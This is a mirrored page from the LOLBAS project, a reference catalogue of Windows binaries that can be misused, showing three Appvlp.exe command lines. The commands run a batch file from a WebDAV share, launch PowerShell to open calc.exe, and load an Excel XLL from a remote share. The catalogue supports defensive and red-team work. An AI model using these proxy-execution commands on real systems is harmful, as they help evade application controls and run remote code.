1
0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2025-01-20 10:14:34 +01:00
LOLBAS/Archive-Old-Version/OtherMSBinaries/Appvlp.exe.md

885 B

Appvlp.exe

  • Functions: Execute

AppVLP.exe \\webdav\calc.bat
Executes calc.bat through AppVLP.exe

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.